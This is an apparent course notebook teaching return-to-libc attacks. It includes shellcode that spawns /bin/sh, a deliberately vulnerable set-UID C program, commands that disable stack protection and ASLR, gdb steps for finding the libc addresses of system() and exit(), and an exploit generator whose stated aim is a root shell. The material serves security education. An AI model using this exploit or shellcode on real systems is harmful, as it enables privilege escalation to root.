## <center> Return-to-libc Attack </center>

### Stack-based Buffer Overflow Attack

- Malicious data are used to overflow a function'return address in order to get the program to *jump* to a different location on the stack which stores malicious code. 
- This can be countered by making the stack non-executable

In [ ]:
%%writefile source/shellcode.c
#include <string.h>

const char code[] =
  "\x31\xc0\x50\x68//sh\x68/bin"
  "\x89\xe3\x50\x53\x89\xe1\x99"
  "\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
   char buffer[sizeof(code)];
   strcpy(buffer, code);
   ((void(*)( ))buffer)( );
}

In a terminal, run the following commands:

```
$ gcc -z execstack -o shellcode Computer-Security/source/shellcode.c
$ ./shellcode
$ gcc -z noexecstack shellcode Computer-Security/source/shellcode.c
$ ./shellcode
```

- Good countermeasure, but not enough.
- If the stack is not executable, an alternative solution is to make the program jump to where there are executable codes.
- Enter the region for standard C library on Linux, called **libc**

<center> <img src="figure/return-to-libc/libc1.jpg" width="700"/>

In [1]:
%%writefile source/stack.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int vul_func(char *str)
{
    char buffer[50];

    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);    

    return 1;
}

int main(int argc, char **argv)
{
    char str[240];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 200, badfile);
    vul_func(str);

    printf("Returned Properly\n");
    return 1;
}

Overwriting source/mem_layout.c


Run the followings:

```
$ gcc -fno-stack-protector -z noexecstack -o stack Computer-Security/source/stack.c
$ sudo sysctl -w kernel.randomize_va_space=0
```
- `-fno-stack-protector`: disable protection against changes in stack
- `-z noexecstack`: actually turn on protection against executable stack
- `kernel.randomize_va_space=0`: disable address space layout randomization

Afterward, turn the programinto a root-owned set-UID program


### Launch the Return-to-libc Attack

- Task A: find where in memory is `system()` located
- Task B: find the address of the `/bin/sh` string
- Task C: where to place the address of `/bin/sh` in the stack so that `system()` can get to it

#### Task A: Find the address of the system() function

Anytime a program runs, the libc library will be loaded into memory. Using `gdb`, we can find out the location of `system()`with the following commands:

```
$ gdb stack
(gdb-peda)$ run
(gdb-peda)$ p system
(gdb-peda)$ p exit
(gdb-peda)$ quit
```

#### Exercise:

Rerun the above process with a different program (pick one from our previous lectures) to confirm that the locations of `system` and `exit` do not change. 

#### Task B: Find the Address of the String "/bin/sh"

- We want `system()` to execute `/bin/sh`
- Therefore, `/bin/sh` must be in memory, and its address should be passed to `system()` as an argument. 
  - We cannot embed this in the source code (no access to source code of vulnerable program)
- Solution:
  - Utilize environment variables


In [5]:
%%writefile source/find_myshell.c
#include <stdio.h>

int main()
{
  char *shell = (char *) getenv("MYSHELL");
  if (shell) {
    printf ("Value: %s\n", shell);
    printf ("Address: %x\n", (unsigned int)shell); 
  }
  return 1;
}

Writing source/find_myshell.c


Run the followings:

```
$ gcc -o find_myshell55 Computer-Security/source/find_myshell.c
$ export MYSHELL="/bin/sh"
$ ./find_myshell55
```

Recompile find_myshell.c to a file named `myshell77`. Rerun the program. Is the address for `/bin/sh` still the same? Why?

#### Function Prologue and Function Epilogue

- In buffer overflow, we manually place both `system()` and its corresponding arguments on the stack for execution.
- In return-to-libc, we invoke `system()` remotely.
  - How can we place the corresponding arguments onto the stack?
  - `$esp`: Stack register

<center> <img src="figure/return-to-libc/libc2.jpg" width="400"/>

What happens before the internal instruction of a function is executed?

<center> <img src="figure/return-to-libc/libc3.jpg" width="700"/>

<center> <img src="figure/return-to-libc/libc4.jpg" width="700"/>

#### Important notes:
- The malicious function did finish properly
  - Its function epilogue was called
  - We know the location of `$esp`
- The malicious call redirect RA (next instruction) to a new function
  - Activate this new function's prologue
  - But this new fuction will rely on values in `$esp` for execution
  - We need to manipulate `$esp`

Important when observe this picture: `$esp` and `$ebp` are values from `vul_func()`, but they are changed due to the procedural execution of `vul_func()`'s epilogue and `system()`'s prologue.

<center> <img src="figure/return-to-libc/libc5.jpg" width="700"/>

In [16]:
%%writefile source/stack.c
/* stack.c */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int vul_func(char *str)
{
    char buffer[50];

    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[240];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 200, badfile);
    
    char *shell = (char *) getenv("MYSHELL");
    if (shell) {
      printf ("Value: %s\n", shell);
      printf ("Address: %x\n", (unsigned int)shell); 
    }
    
    vul_func(str);

    printf("Returned Properly\n");
    return 1;
}

Overwriting source/stack.c


Run the followings:
```
$ gcc -g -o stack_dbg -z execstack -fno-stack-protector Computer-Security/source/stack.c
$ rm badfile
$ touch badfile
$ gdb stack_dbg
gdb-peda$ break foo
gdb-peda$ run
gdb-peda$ print $ebp
gdb-peda$ print &buffer
gdb-peda$ print ebp - buffer
gdb-peda$ quit
```

- Offset of **3** is distance + 4: address of `system()`
- Offset of **2** is distance + 8: address of `exit()`
- Offset of **1** is distance plus 12: address of `/bin/sh`

<center> <img src="figure/return-to-libc/libc5.jpg" width="600"/>

In [18]:
%%writefile source/ret_to_libc_exploit.c
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
  char buf[200];
  FILE *badfile;

  memset(buf, 0xaa, 200); // fill the buffer with non-zeros

  *(long *) &buf[70] = 0xbffffdbf ;   //  The address of "/bin/sh"
  *(long *) &buf[66] = 0xb7d989d0 ;   //  The address of exit()
  *(long *) &buf[62] = 0xb7da4da0 ;   //  The address of system()

  badfile = fopen("./badfile", "w");
  fwrite(buf, sizeof(buf), 1, badfile);
  fclose(badfile);
}

Overwriting source/ret_to_libc_exploit.c


Run the followings (after modify exploit.c accordingly)
```
$ gcc -fno-stack-protector -z noexecstack -o stack Computer-Security/source/stack.c
$ sudo sysctl -w kernel.randomize_va_space=0
$ sudo chown root stack
$ sudo chmod 4755 stack
$ rm badfile
$ gcc Computer-Security/source/ret_to_libc_exploit.c -o exploit
$ ./exploit
$ ./stack
```
Did you get the root shell?